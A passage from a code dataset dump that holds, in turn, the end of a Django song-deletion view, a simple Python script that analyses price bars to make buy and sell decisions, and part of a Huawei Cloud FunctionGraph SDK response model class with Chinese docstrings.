models.Song\n\n#View for Deleting a Song from the Database\n#When successful, reverse_lazy returns user to ListView\nclass SongDeleteView(DeleteView):\n model = models.Song\n success_url = reverse_lazy(\"songs:list\")\n","sub_path":"songs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"8195541","text":"import datetime\n\nfrom collections import namedtuple\n\nBarsAnalysis = namedtuple('BarsAnalysis', 'decision close high1 low1 high2 low2')\n\n\nclass TradeData:\n profit_loss: float = 0\n position: int = 0\n price: float = None\n stop_loss: float = None\n\n\nclass Bar(object):\n def __init__(self, barline: str):\n fields = [x.strip() for x in barline.split(',')]\n try:\n self.date = datetime.datetime.strptime(fields[0][6:], '%Y%m%d %H:%M:%S')\n except:\n print(barline)\n raise ValueError\n self.open = float(fields[1].split(':')[1])\n self.high = float(fields[2].split(':')[1])\n self.low = float(fields[3].split(':')[1])\n self.close = float(fields[4].split(':')[1])\n self.volume = float(fields[5].split(':')[1])\n self.average = float(fields[6].split(':')[1])\n self.barCount = int(fields[7].split(':')[1])\n\n def __str__(self):\n return \"Date: %s, Open: %f, High: %f, Low: %f, Close: %f, Volume: %d, Average: %f, BarCount: %d\" % (\n self.date, self.open, self.high,\n self.low, self.close, self.volume, self.average, self.barCount)\n\n\nclass GroupBar:\n def __init__(self, bars: [Bar]):\n self.high = max([b.high for b in bars])\n self.low = min([b.low for b in bars])\n self.open = bars[0].open\n self.close = bars[-1].close\n\n\ndef analyzeBars(bars: [Bar], size=5):\n b1 = GroupBar(bars[:size])\n b2 = GroupBar(bars[size:])\n if (b2.high > b1.high) and (b2.low > b1.low) and b2.close > b2.open:\n decision = 'BUY'\n elif (b2.high < b1.high) and (b2.low < b1.low) and b2.close < b2.open:\n decision = \"SELL\"\n else:\n decision = 'HOLD'\n return (decision, b1, b2)\n\n\ndef trade(bars: [Bar]):\n decision, bar1, bar2 = analyzeBars(bars)\n\n if TradeData.position == 0:\n if decision == 'BUY':\n openLongPosition(bar2)\n elif decision == 'SELL':\n openShortPosition(bar2)\n elif decision == 'HOLD':\n pass\n else:\n raise ValueError('Unknown decision', decision)\n\n elif TradeData.position > 0:\n if decision == 'SELL':\n reverseLongToShort(bar2)\n elif bar2.close < TradeData.stop_loss:\n closeLongPosition(bar2)\n\n\n else: # TradeData.position < 0\n if decision == 'BUY':\n reverseShortToLong(bar2)\n elif bar2.close > TradeData.stop_loss:\n closeShortPosition(bar2)\n\n\ndef openLongPosition(bar2: GroupBar):\n print('Open Long')\n TradeData.position = 1\n TradeData.stop_loss = bar2.low\n\n\ndef openShortPosition(bar2: GroupBar):\n print('Open Short')\n TradeData.position = -1\n TradeData.stop_loss = bar2.high\n\n\ndef closeLongPosition(bar2: GroupBar):\n print(\"Close Long\")\n TradeData.position = 0\n TradeData.stop_loss = None\n\n\ndef closeShortPosition(bar2: GroupBar):\n print(\"Close Short\")\n TradeData.position = 0\n TradeData.stop_loss = None\n\n\ndef reverseLongToShort(bar2: GroupBar):\n print(\"Reverse Long to Short\")\n TradeData.position = -1\n TradeData.stop_loss = bar2.high\n\n\ndef reverseShortToLong(bar2: GroupBar):\n print(\"Reverse Short to Long\")\n TradeData.position = 1\n TradeData.stop_loss = bar2.low\n\n\nbars_filename = \"../bars0702.txt\"\nwith open(bars_filename, 'r') as barfile:\n bars = []\n line = barfile.readline()\n last_bar = Bar(line)\n last_time = last_bar.date.time()\n bars.append(last_bar)\n line = barfile.readline()\n while line != \"\":\n this_bar = Bar(line)\n this_time = this_bar.date.time()\n if this_time > last_time:\n bars.append(this_bar)\n else:\n # print(f'Got {len(bars)} bars')\n # print(bars[0].date.time(), bars[-1].date.time())\n trade(bars)\n bars.clear()\n bars.append(this_bar)\n last_bar = this_bar\n last_time = this_bar.date.time()\n line = barfile.readline()\n\nprint(f'Profit/Loss = {TradeData.profit_loss}')\n","sub_path":"newprocess.py","file_name":"newprocess.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"167286146","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.sdk_response import SdkResponse\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass ImportFunctionResponse(SdkResponse):\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'func_urn': 'str',\n 'func_name': 'str',\n 'domain_id': 'str',\n 'namespace': 'str',\n 'project_name': 'str',\n 'package': 'str',\n 'runtime': 'str',\n 'timeout': 'int',\n 'handler': 'str',\n 'memory_size': 'int',\n 'gpu_memory': 'int',\n 'cpu': 'int',\n 'code_type': 'str',\n 'code_url': 'str',\n 'code_filename': 'str',\n 'code_size': 'int',\n 'user_data': 'str',\n 'digest': 'str',\n 'version': 'str',\n 'image_name': 'str',\n 'xrole': 'str',\n 'app_xrole': 'str',\n 'description': 'str',\n 'version_description': 'str',\n 'last_modified': 'datetime',\n 'func_vpc': 'FuncVpc',\n 'depend_list': 'list[str]',\n 'depend_version_list': 'list[str]',\n 'strategy_config': 'StrategyConfig',\n 'extend_config': 'str',\n 'initializer_handler': 'str',\n 'initializer_timeout': 'int',\n 'enterprise_project_id': 'str'\n }\n\n attribute_map = {\n 'func_urn': 'func_urn',\n 'func_name': 'func_name',\n 'domain_id': 'domain_id',\n 'namespace': 'namespace',\n 'project_name': 'project_name',\n 'package': 'package',\n 'runtime': 'runtime',\n 'timeout': 'timeout',\n 'handler': 'handler',\n 'memory_size': 'memory_size',\n 'gpu_memory': 'gpu_memory',\n 'cpu': 'cpu',\n 'code_type': 'code_type',\n 'code_url': 'code_url',\n 'code_filename': 'code_filename',\n 'code_size': 'code_size',\n 'user_data': 'user_data',\n 'digest': 'digest',\n 'version': 'version',\n 'image_name': 'image_name',\n 'xrole': 'xrole',\n 'app_xrole': 'app_xrole',\n 'description': 'description',\n 'version_description': 'version_description',\n 'last_modified': 'last_modified',\n 'func_vpc': 'func_vpc',\n 'depend_list': 'depend_list',\n 'depend_version_list': 'depend_version_list',\n 'strategy_config': 'strategy_config',\n 'extend_config': 'extend_config',\n 'initializer_handler': 'initializer_handler',\n 'initializer_timeout': 'initializer_timeout',\n 'enterprise_project_id': 'enterprise_project_id'\n }\n\n def __init__(self, func_urn=None, func_name=None, domain_id=None, namespace=None, project_name=None, package=None, runtime=None, timeout=None, handler=None, memory_size=None, gpu_memory=None, cpu=None, code_type=None, code_url=None, code_filename=None, code_size=None, user_data=None, digest=None, version=None, image_name=None, xrole=None, app_xrole=None, description=None, version_description=None, last_modified=None, func_vpc=None, depend_list=None, depend_version_list=None, strategy_config=None, extend_config=None, initializer_handler=None, initializer_timeout=None, enterprise_project_id=None):\n \"\"\"ImportFunctionResponse\n\n The model defined in huaweicloud sdk\n\n :param func_urn: 函数的URN(Uniform Resource Name),唯一标识函数。\n :type func_urn: str\n :param func_name: 函数名称。\n :type func_name: str\n :param domain_id: 域名id。\n :type domain_id: str\n :param namespace: 租户的project id。\n :type namespace: str\n :param project_name: 租户的project name。\n :type project_name: str\n :param package: 函数所属的分组Package,用于用户针对函数的自定义分组。\n :type package: str\n :param runtime: FunctionGraph函数的执行环境 Python2.7: Python语言2.7版本。 Python3.6: Pyton语言3.6版本。 Python3.9: Python语言3.9版本。 Go1.8: Go语言1.8版本。 Go1.x: Go语言1.x版本。 Java8: Java语言8版本。 Java11: Java语言11版本。 Node.js6.10: Nodejs语言6.10版本。 Node.js8.10: Nodejs语言8.10版本。 Node.js10.16: Nodejs语言10.16版本。 Node.js12.13: Nodejs语言12.13版本。 Node.js14.18: Nodejs语言14.18版本。 C#(.NET Core 2.0): C#语言2.0版本。 C#(.NET Core 2.1): C#语言2.1版本。 C#(.NET Core 3.1): C#语言3.1版本。 Custom: 自定义运行时。 PHP7.3: Php语言7.3版本。 http: HTTP函数。\n :type runtime: str\n :param timeout: 函数执行超时时间,超时函数将被强行停止,范围3~900秒,可以通过白名单配置延长到12小时,具体可以咨询华为云函数工作流服务进行配置\n :type timeout: int\n :param handler: 函数执行入口 规则:xx.xx,必须包含“. ” 举例:对于node.js函数:myfunction.handler,则表示函数的文件名为myfunction.js,执行的入口函数名为handler。\n :type handler: str\n :param memory_size: 函数消耗的内存。 单位M。 取值范围为:128、256、512、768、1024、1280、1536、1792、2048、2560、3072、3584、4096。 最小值为128,最大值为4096。\n :type memory_size: int\n :param gpu_memory: 函数消耗的显存,只支持自定义运行时与自定义镜像函数配置GPU。 单位MB。 取值范围为:1024、2048、3072、4096、5120、6144、7168、8192、9216、10240、11264、12288、13312、14336、15360、16384。 最小值为1024,最大值为16384。\n :type gpu_memory: int\n :param cpu: 函数占用的cpu资源。 单位为millicore(1 core=1000 millicores)。 取值与MemorySize成比例,默认是128M内存占0.1个核(100 millicores)。 函数占用的CPU为基础CPU:200 millicores,再加上内存按比例占用的CPU,计算方法:内存/128 *100 + 200。\n :type cpu: int\n :param code_type: 函数代码类型,取值有4种。 inline: UI在线编辑代码。 zip: 函数代码为zip包。 obs: 函数代码来源于obs存储。 jar: 函数代码为jar包,主要针对Java函数。\n :type code_type: str\n :param code_url: 当CodeType为obs时,该值为函数代码包在OBS上的地址,CodeType为其他值时,该字段为空。\n :type code_url: str\n :param code_filename: 函数的文件名,当CodeType为jar/zip时必须提供该字段,inline和obs不需要提供。\n :type code_filename: str\n :param code_size: 函数大小,单位:字节。\n :type code_size: int\n :param user_data: 用户自定义的name/value信息。 在函数中使用的参数。 举例:如函数要访问某个主机,可以设置自定义参数:Host={host_ip},最多定义20个,总长度不超过4KB。\n :type user_data: str\n :param digest: 函数代码SHA512 hash值,用于判断函数是否变化。\n :type digest: str\n :param version: 函数版本号,由系统自动生成,规则:vYYYYMMDD-HHMMSS(v+年月日-时分秒)。\n :type version: str\n :param image_name: 函数版本的内部标识。\n :type image_name: str\n :param xrole: 函数使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n :type xrole: str\n :param app_xrole: 函数app使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n :type app_xrole: str\n :param description: 函数描述。\n :type description: str\n :param version_description: 函数版本描述。\n :type version_description: str\n :param last_modified: 函数最后一次更新时间。\n :type last_modified: datetime\n :param func_vpc: \n :type func_vpc: :class:`huaweicloudsdkfunctiongraph.v2.FuncVpc`\n :param depend_list: 依赖id列表\n :type depend_list: list[str]\n :param depend_version_list: 依赖版本id列表\n :type depend_version_list: list[str]\n :param strategy_config: \n :type strategy_config: :class:`huaweicloudsdkfunctiongraph.v2.StrategyConfig`\n :param extend_config: 函数扩展配置。\n :type extend_config: str\n :param initializer_handler: 函数初始化入口,规则:xx.xx,必须包含“. ���。 举例:对于node.js函数:myfunction.initializer,则表示函数的文件名为myfunction.js,初始化的入口函数名为initializer。\n :type initializer_handler: str\n :param initializer_timeout: 初始化超时时间,超时函数将被强行停止,范围1~300秒。\n :type initializer_timeout: int\n :param enterprise_project_id: 企业项目ID,在企业用户创建函数时必填。\n :type enterprise_project_id: str\n \"\"\"\n \n super(ImportFunctionResponse, self).__init__()\n\n self._func_urn = None\n self._func_name = None\n self._domain_id = None\n self._namespace = None\n self._project_name = None\n self._package = None\n self._runtime = None\n self._timeout = None\n self._handler = None\n self._memory_size = None\n self._gpu_memory = None\n self._cpu = None\n self._code_type = None\n self._code_url = None\n self._code_filename = None\n self._code_size = None\n self._user_data = None\n self._digest = None\n self._version = None\n self._image_name = None\n self._xrole = None\n self._app_xrole = None\n self._description = None\n self._version_description = None\n self._last_modified = None\n self._func_vpc = None\n self._depend_list = None\n self._depend_version_list = None\n self._strategy_config = None\n self._extend_config = None\n self._initializer_handler = None\n self._initializer_timeout = None\n self._enterprise_project_id = None\n self.discriminator = None\n\n if func_urn is not None:\n self.func_urn = func_urn\n if func_name is not None:\n self.func_name = func_name\n if domain_id is not None:\n self.domain_id = domain_id\n if namespace is not None:\n self.namespace = namespace\n if project_name is not None:\n self.project_name = project_name\n if package is not None:\n self.package = package\n if runtime is not None:\n self.runtime = runtime\n if timeout is not None:\n self.timeout = timeout\n if handler is not None:\n self.handler = handler\n if memory_size is not None:\n self.memory_size = memory_size\n if gpu_memory is not None:\n self.gpu_memory = gpu_memory\n if cpu is not None:\n self.cpu = cpu\n if code_type is not None:\n self.code_type = code_type\n if code_url is not None:\n self.code_url = code_url\n if code_filename is not None:\n self.code_filename = code_filename\n if code_size is not None:\n self.code_size = code_size\n if user_data is not None:\n self.user_data = user_data\n if digest is not None:\n self.digest = digest\n if version is not None:\n self.version = version\n if image_name is not None:\n self.image_name = image_name\n if xrole is not None:\n self.xrole = xrole\n if app_xrole is not None:\n self.app_xrole = app_xrole\n if description is not None:\n self.description = description\n if version_description is not None:\n self.version_description = version_description\n if last_modified is not None:\n self.last_modified = last_modified\n if func_vpc is not None:\n self.func_vpc = func_vpc\n if depend_list is not None:\n self.depend_list = depend_list\n if depend_version_list is not None:\n self.depend_version_list = depend_version_list\n if strategy_config is not None:\n self.strategy_config = strategy_config\n if extend_config is not None:\n self.extend_config = extend_config\n if initializer_handler is not None:\n self.initializer_handler = initializer_handler\n if initializer_timeout is not None:\n self.initializer_timeout = initializer_timeout\n if enterprise_project_id is not None:\n self.enterprise_project_id = enterprise_project_id\n\n @property\n def func_urn(self):\n \"\"\"Gets the func_urn of this ImportFunctionResponse.\n\n 函数的URN(Uniform Resource Name),唯一标识函数。\n\n :return: The func_urn of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._func_urn\n\n @func_urn.setter\n def func_urn(self, func_urn):\n \"\"\"Sets the func_urn of this ImportFunctionResponse.\n\n 函数的URN(Uniform Resource Name),唯一标识函数。\n\n :param func_urn: The func_urn of this ImportFunctionResponse.\n :type func_urn: str\n \"\"\"\n self._func_urn = func_urn\n\n @property\n def func_name(self):\n \"\"\"Gets the func_name of this ImportFunctionResponse.\n\n 函数名称。\n\n :return: The func_name of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._func_name\n\n @func_name.setter\n def func_name(self, func_name):\n \"\"\"Sets the func_name of this ImportFunctionResponse.\n\n 函数名称。\n\n :param func_name: The func_name of this ImportFunctionResponse.\n :type func_name: str\n \"\"\"\n self._func_name = func_name\n\n @property\n def domain_id(self):\n \"\"\"Gets the domain_id of this ImportFunctionResponse.\n\n 域名id。\n\n :return: The domain_id of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._domain_id\n\n @domain_id.setter\n def domain_id(self, domain_id):\n \"\"\"Sets the domain_id of this ImportFunctionResponse.\n\n 域名id。\n\n :param domain_id: The domain_id of this ImportFunctionResponse.\n :type domain_id: str\n \"\"\"\n self._domain_id = domain_id\n\n @property\n def namespace(self):\n \"\"\"Gets the namespace of this ImportFunctionResponse.\n\n 租户的project id。\n\n :return: The namespace of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._namespace\n\n @namespace.setter\n def namespace(self, namespace):\n \"\"\"Sets the namespace of this ImportFunctionResponse.\n\n 租户的project id。\n\n :param namespace: The namespace of this ImportFunctionResponse.\n :type namespace: str\n \"\"\"\n self._namespace = namespace\n\n @property\n def project_name(self):\n \"\"\"Gets the project_name of this ImportFunctionResponse.\n\n 租户的project name。\n\n :return: The project_name of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._project_name\n\n @project_name.setter\n def project_name(self, project_name):\n \"\"\"Sets the project_name of this ImportFunctionResponse.\n\n 租户的project name。\n\n :param project_name: The project_name of this ImportFunctionResponse.\n :type project_name: str\n \"\"\"\n self._project_name = project_name\n\n @property\n def package(self):\n \"\"\"Gets the package of this ImportFunctionResponse.\n\n 函数所属的分组Package,用于用户针对函数的自定义分组。\n\n :return: The package of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._package\n\n @package.setter\n def package(self, package):\n \"\"\"Sets the package of this ImportFunctionResponse.\n\n 函数所属的分组Package,用于用户针对函数的自定义分组。\n\n :param package: The package of this ImportFunctionResponse.\n :type package: str\n \"\"\"\n self._package = package\n\n @property\n def runtime(self):\n \"\"\"Gets the runtime of this ImportFunctionResponse.\n\n FunctionGraph函数的执行环境 Python2.7: Python语言2.7版本。 Python3.6: Pyton语言3.6版本。 Python3.9: Python语言3.9版本。 Go1.8: Go语言1.8版本。 Go1.x: Go语言1.x版本。 Java8: Java语言8版本。 Java11: Java语言11版本。 Node.js6.10: Nodejs语言6.10版本。 Node.js8.10: Nodejs语言8.10版本。 Node.js10.16: Nodejs语言10.16版本。 Node.js12.13: Nodejs语言12.13版本。 Node.js14.18: Nodejs语言14.18版本。 C#(.NET Core 2.0): C#语言2.0版本。 C#(.NET Core 2.1): C#语言2.1版本。 C#(.NET Core 3.1): C#语言3.1版本。 Custom: 自定义运行时。 PHP7.3: Php语言7.3版本。 http: HTTP函数。\n\n :return: The runtime of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._runtime\n\n @runtime.setter\n def runtime(self, runtime):\n \"\"\"Sets the runtime of this ImportFunctionResponse.\n\n FunctionGraph函数的执行环境 Python2.7: Python语言2.7版本。 Python3.6: Pyton语言3.6版本。 Python3.9: Python语言3.9版本。 Go1.8: Go语言1.8版本。 Go1.x: Go语言1.x版本。 Java8: Java语言8版本。 Java11: Java语言11版本。 Node.js6.10: Nodejs语言6.10版本。 Node.js8.10: Nodejs语言8.10版本。 Node.js10.16: Nodejs语言10.16版本。 Node.js12.13: Nodejs语言12.13版本。 Node.js14.18: Nodejs语言14.18版本。 C#(.NET Core 2.0): C#语言2.0版本。 C#(.NET Core 2.1): C#语言2.1版本。 C#(.NET Core 3.1): C#语言3.1版本。 Custom: 自定义运行时。 PHP7.3: Php语言7.3版本。 http: HTTP函数。\n\n :param runtime: The runtime of this ImportFunctionResponse.\n :type runtime: str\n \"\"\"\n self._runtime = runtime\n\n @property\n def timeout(self):\n \"\"\"Gets the timeout of this ImportFunctionResponse.\n\n 函数执行超时时间,超时函数将被强行停止,范围3~900秒,可以通过白名单配置延长到12小时,具体可以咨询华为云函数工作流服务进行���置\n\n :return: The timeout of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._timeout\n\n @timeout.setter\n def timeout(self, timeout):\n \"\"\"Sets the timeout of this ImportFunctionResponse.\n\n 函数执行超时时间,超时函数将被强行停止,范围3~900秒,可以通过白名单配置延长到12小时,具体可以咨询华为云函数工作流服务进行配置\n\n :param timeout: The timeout of this ImportFunctionResponse.\n :type timeout: int\n \"\"\"\n self._timeout = timeout\n\n @property\n def handler(self):\n \"\"\"Gets the handler of this ImportFunctionResponse.\n\n 函数执行入口 规则:xx.xx,必须包含“. ” 举例:对于node.js函数:myfunction.handler,则表示函数的文件名为myfunction.js,执行的入口函数名为handler。\n\n :return: The handler of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._handler\n\n @handler.setter\n def handler(self, handler):\n \"\"\"Sets the handler of this ImportFunctionResponse.\n\n 函数执行入口 规则:xx.xx,必须包含“. ” 举例:对于node.js函数:myfunction.handler,则表示函数的文件名为myfunction.js,执行的入口函数名为handler。\n\n :param handler: The handler of this ImportFunctionResponse.\n :type handler: str\n \"\"\"\n self._handler = handler\n\n @property\n def memory_size(self):\n \"\"\"Gets the memory_size of this ImportFunctionResponse.\n\n 函数消耗的内存。 单位M。 取值范围为:128、256、512、768、1024、1280、1536、1792、2048、2560、3072、3584、4096。 最小值为128,最大值为4096。\n\n :return: The memory_size of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._memory_size\n\n @memory_size.setter\n def memory_size(self, memory_size):\n \"\"\"Sets the memory_size of this ImportFunctionResponse.\n\n 函数消耗的内存。 单位M。 取值范围为:128、256、512、768、1024、1280、1536、1792、2048、2560、3072、3584、4096。 最小值为128,最大值为4096。\n\n :param memory_size: The memory_size of this ImportFunctionResponse.\n :type memory_size: int\n \"\"\"\n self._memory_size = memory_size\n\n @property\n def gpu_memory(self):\n \"\"\"Gets the gpu_memory of this ImportFunctionResponse.\n\n 函数消耗的显存,只支持自定义运行时与自定义镜像函数配置GPU。 单位MB。 取值范围为:1024、2048、3072、4096、5120、6144、7168、8192、9216、10240、11264、12288、13312、14336、15360、16384。 最小值为1024,最大值为16384。\n\n :return: The gpu_memory of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._gpu_memory\n\n @gpu_memory.setter\n def gpu_memory(self, gpu_memory):\n \"\"\"Sets the gpu_memory of this ImportFunctionResponse.\n\n 函数消耗的显存,只支持自定义运行时与自定义镜像函数配置GPU。 单位MB。 取值范围为:1024、2048、3072、4096、5120、6144、7168、8192、9216、10240、11264、12288、13312、14336、15360、16384。 最小值为1024,最大值为16384。\n\n :param gpu_memory: The gpu_memory of this ImportFunctionResponse.\n :type gpu_memory: int\n \"\"\"\n self._gpu_memory = gpu_memory\n\n @property\n def cpu(self):\n \"\"\"Gets the cpu of this ImportFunctionResponse.\n\n 函数占用的cpu资源。 单位为millicore(1 core=1000 millicores)。 取值与MemorySize成比例,默认是128M内存占0.1个核(100 millicores)。 函数占用的CPU为基础CPU:200 millicores,再加上内存按比例占用的CPU,计算方法:内存/128 *100 + 200。\n\n :return: The cpu of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._cpu\n\n @cpu.setter\n def cpu(self, cpu):\n \"\"\"Sets the cpu of this ImportFunctionResponse.\n\n 函数占用的cpu资源。 单位为millicore(1 core=1000 millicores)。 取值与MemorySize成比例,默认是128M内存占0.1个核(100 millicores)。 函数占用的CPU为基础CPU:200 millicores,再加上内存按比例占用的CPU,计算方法:内存/128 *100 + 200。\n\n :param cpu: The cpu of this ImportFunctionResponse.\n :type cpu: int\n \"\"\"\n self._cpu = cpu\n\n @property\n def code_type(self):\n \"\"\"Gets the code_type of this ImportFunctionResponse.\n\n 函数代码类型,取值有4种。 inline: UI在线编辑代码。 zip: 函数代码为zip包。 obs: 函数代码来源于obs存储。 jar: 函数代码为jar包,主要针对Java函数。\n\n :return: The code_type of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._code_type\n\n @code_type.setter\n def code_type(self, code_type):\n \"\"\"Sets the code_type of this ImportFunctionResponse.\n\n 函数代码类型,取值有4种。 inline: UI在线编辑代码。 zip: 函数代码为zip包。 obs: 函数代码来源于obs存储。 jar: 函数代码为jar包,主要针对Java函数。\n\n :param code_type: The code_type of this ImportFunctionResponse.\n :type code_type: str\n \"\"\"\n self._code_type = code_type\n\n @property\n def code_url(self):\n \"\"\"Gets the code_url of this ImportFunctionResponse.\n\n 当CodeType为obs时,该值为函数代码包在OBS上的地址,CodeType为其他值时,该字段为空。\n\n :return: The code_url of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._code_url\n\n @code_url.setter\n def code_url(self, code_url):\n \"\"\"Sets the code_url of this ImportFunctionResponse.\n\n 当CodeType为obs时,该值为函数代码包在OBS上的地址,CodeType为其他值时,该字段为空。\n\n :param code_url: The code_url of this ImportFunctionResponse.\n :type code_url: str\n \"\"\"\n self._code_url = code_url\n\n @property\n def code_filename(self):\n \"\"\"Gets the code_filename of this ImportFunctionResponse.\n\n 函数的文件名,当CodeType为jar/zip时必须提供该字段,inline和obs不需要提供。\n\n :return: The code_filename of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._code_filename\n\n @code_filename.setter\n def code_filename(self, code_filename):\n \"\"\"Sets the code_filename of this ImportFunctionResponse.\n\n 函数的文件名,当CodeType为jar/zip时必须提供该字段,inline和obs不需要提供。\n\n :param code_filename: The code_filename of this ImportFunctionResponse.\n :type code_filename: str\n \"\"\"\n self._code_filename = code_filename\n\n @property\n def code_size(self):\n \"\"\"Gets the code_size of this ImportFunctionResponse.\n\n 函数大小,单位:字节。\n\n :return: The code_size of this ImportFunctionResponse.\n :rtype: int\n \"\"\"\n return self._code_size\n\n @code_size.setter\n def code_size(self, code_size):\n \"\"\"Sets the code_size of this ImportFunctionResponse.\n\n 函数大小,单位:字节。\n\n :param code_size: The code_size of this ImportFunctionResponse.\n :type code_size: int\n \"\"\"\n self._code_size = code_size\n\n @property\n def user_data(self):\n \"\"\"Gets the user_data of this ImportFunctionResponse.\n\n 用户自定义的name/value信息。 在函数中使用的参数。 举例:如函数要访问某个主机,可以设置自定义参数:Host={host_ip},最多定义20个,总长度不超过4KB。\n\n :return: The user_data of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._user_data\n\n @user_data.setter\n def user_data(self, user_data):\n \"\"\"Sets the user_data of this ImportFunctionResponse.\n\n 用户自定义的name/value信息。 在函数中使用的参数。 举例:如函数要访问某个主机,可以设置自定义参数:Host={host_ip},最多定义20个,总长度不超过4KB。\n\n :param user_data: The user_data of this ImportFunctionResponse.\n :type user_data: str\n \"\"\"\n self._user_data = user_data\n\n @property\n def digest(self):\n \"\"\"Gets the digest of this ImportFunctionResponse.\n\n 函数代码SHA512 hash值,用于判断函数是否变化。\n\n :return: The digest of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._digest\n\n @digest.setter\n def digest(self, digest):\n \"\"\"Sets the digest of this ImportFunctionResponse.\n\n 函数代码SHA512 hash值,用于判断函数是否变化。\n\n :param digest: The digest of this ImportFunctionResponse.\n :type digest: str\n \"\"\"\n self._digest = digest\n\n @property\n def version(self):\n \"\"\"Gets the version of this ImportFunctionResponse.\n\n 函数版本号,由系统自动生成,规则:vYYYYMMDD-HHMMSS(v+年月日-时分秒)。\n\n :return: The version of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._version\n\n @version.setter\n def version(self, version):\n \"\"\"Sets the version of this ImportFunctionResponse.\n\n 函数版本号,由系统自动生成,规则:vYYYYMMDD-HHMMSS(v+年月日-时分秒)。\n\n :param version: The version of this ImportFunctionResponse.\n :type version: str\n \"\"\"\n self._version = version\n\n @property\n def image_name(self):\n \"\"\"Gets the image_name of this ImportFunctionResponse.\n\n 函数版本的内部标识。\n\n :return: The image_name of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._image_name\n\n @image_name.setter\n def image_name(self, image_name):\n \"\"\"Sets the image_name of this ImportFunctionResponse.\n\n 函数版本的内部标识。\n\n :param image_name: The image_name of this ImportFunctionResponse.\n :type image_name: str\n \"\"\"\n self._image_name = image_name\n\n @property\n def xrole(self):\n \"\"\"Gets the xrole of this ImportFunctionResponse.\n\n 函数使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n\n :return: The xrole of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._xrole\n\n @xrole.setter\n def xrole(self, xrole):\n \"\"\"Sets the xrole of this ImportFunctionResponse.\n\n 函数使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n\n :param xrole: The xrole of this ImportFunctionResponse.\n :type xrole: str\n \"\"\"\n self._xrole = xrole\n\n @property\n def app_xrole(self):\n \"\"\"Gets the app_xrole of this ImportFunctionResponse.\n\n 函数app使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n\n :return: The app_xrole of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._app_xrole\n\n @app_xrole.setter\n def app_xrole(self, app_xrole):\n \"\"\"Sets the app_xrole of this ImportFunctionResponse.\n\n 函数app使用的权限委托名称,需要IAM支持,并在IAM界面创建委托,当函数需要访问其他服务时,必须提供该字段。\n\n :param app_xrole: The app_xrole of this ImportFunctionResponse.\n :type app_xrole: str\n \"\"\"\n self._app_xrole = app_xrole\n\n @property\n def description(self):\n \"\"\"Gets the description of this ImportFunctionResponse.\n\n 函数描述。\n\n :return: The description of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._description\n\n @description.setter\n def description(self, description):\n \"\"\"Sets the description of this ImportFunctionResponse.\n\n 函数描述。\n\n :param description: The description of this ImportFunctionResponse.\n :type description: str\n \"\"\"\n self._description = description\n\n @property\n def version_description(self):\n \"\"\"Gets the version_description of this ImportFunctionResponse.\n\n 函数版本描述。\n\n :return: The version_description of this ImportFunctionResponse.\n :rtype: str\n \"\"\"\n return self._version_description\n\n @version_description.setter\n def version_description(self, version_description):\n \"\"\"Sets the version_description of this ImportFunctionResponse.\n\n 函数版本描述。\n\n :param version_description: The version_description of this ImportFunctionResponse.\n :type version_description: str\n \"\"\"\n self._version_description = version_description\n\n @property\n def last_modified(self):\n \"\"\"Gets the last_modified of this ImportFunctionResponse.\n\n 函数最后一次更新时间。\n\n :return: The last_modified of this ImportFunctionResponse.\n :rtype: datetime\n \"\"\"\n return self._last_modified\n\n @last_modified.setter\n def last_modified(self, last_modified):\n \"\"\"Sets the last_modified of this ImportFunctionResponse.\n\n 函数最后一次更新时间。\n\n :param last_modified: The last_modified of this ImportFunctionResponse.\n :type last_modified: datetime\n \"\"\"\n self._last_modified = last_modified\n\n @property\n def func_vpc(self):\n \"\"\"Gets the func_vpc of this ImportFunctionResponse.\n\n :return: The func_vpc of this ImportFunctionResponse.\n :rtype: :class:`huaweicloudsdkfunctiongraph.v2.FuncVpc`\n \"\"\"\n return self._func_vpc\n\n @func_vpc.setter\n def func_vpc(self, func_vpc):\n \"\"\"Sets the func_vpc of this ImportFunctionResponse.\n\n :param func_vpc: The func_vpc of this ImportFunctionResponse.\n :type func_vpc: :class:`huaweicloudsdkfunctiongraph.v2.FuncVpc`\n \"\"\"\n self._func_vpc = func_vpc\n\n @property\n def depend_list(self):\n \"\"\"Gets the depend_list of this 